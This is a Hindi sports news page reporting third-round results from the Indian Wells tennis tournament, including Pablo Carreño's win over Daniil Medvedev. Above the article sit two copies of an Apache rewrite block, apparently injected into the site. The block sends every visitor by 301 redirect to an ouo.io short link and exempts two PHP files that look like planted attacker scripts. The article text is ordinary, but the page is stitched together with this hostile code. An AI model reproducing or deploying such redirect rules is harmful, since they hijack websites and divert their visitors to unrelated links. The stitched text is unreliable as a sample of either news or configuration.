
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 446
Previous Nextइंडियन वेल्स (अमेरिका)। स्पेन के टेनिस खिलाड़ी पाब्लो कारेनो ने इंडियन वेल्स टेनिस टूर्नामेंट के तीसरे दौर में जीत हासिल की है। इसके साथ ही पाब्लो ने प्री-क्वार्टर फाइनल में जगह बना ली है। टूर्नामेंट के 11वीं वरीय पाब्लो ने पुरुष एकल वर्ग के तीसरे दौर में रूसल के डेनिल मेदवेदेव को मात दी। पाब्लो ने एक घंटे और 29 मिनट तक चले मैच में मेदवेदेव को सीाधे सेटों में 6-1, 7-5 से हराया। प्री-क्वार्टर फाइनल में पाब्लो का सामना अब दक्षिण अफ्रीका के केविन एंडरसन से होगा। एंडरसन ने अपने तीसरे दौर के मैच में अर्जेटीना के निकोलस किकर को 7-6 (1), 7-6 (3) से हराया। इसके अलावा, उरुग्वे को पाब्लो कुएवास ने भी अंतिम-16 दौर में जगह बना ली है। कुएवास जीतने के कारण नहीं, बल्कि अपने प्रतिद्वंद्वी और आस्ट्रिया के खिलाड़ी डोमिनिक थीम के रिटायर्ड हर्ट होने के कारण अगले दौर में पहुंचे हैं। प्री-क्वार्टर फाइनल में उन्हें कोरिया के हेयोन चुंग से भिडऩा है, जिन्होंने तीसरे दौर में थॉमस बर्डिक को मात दी।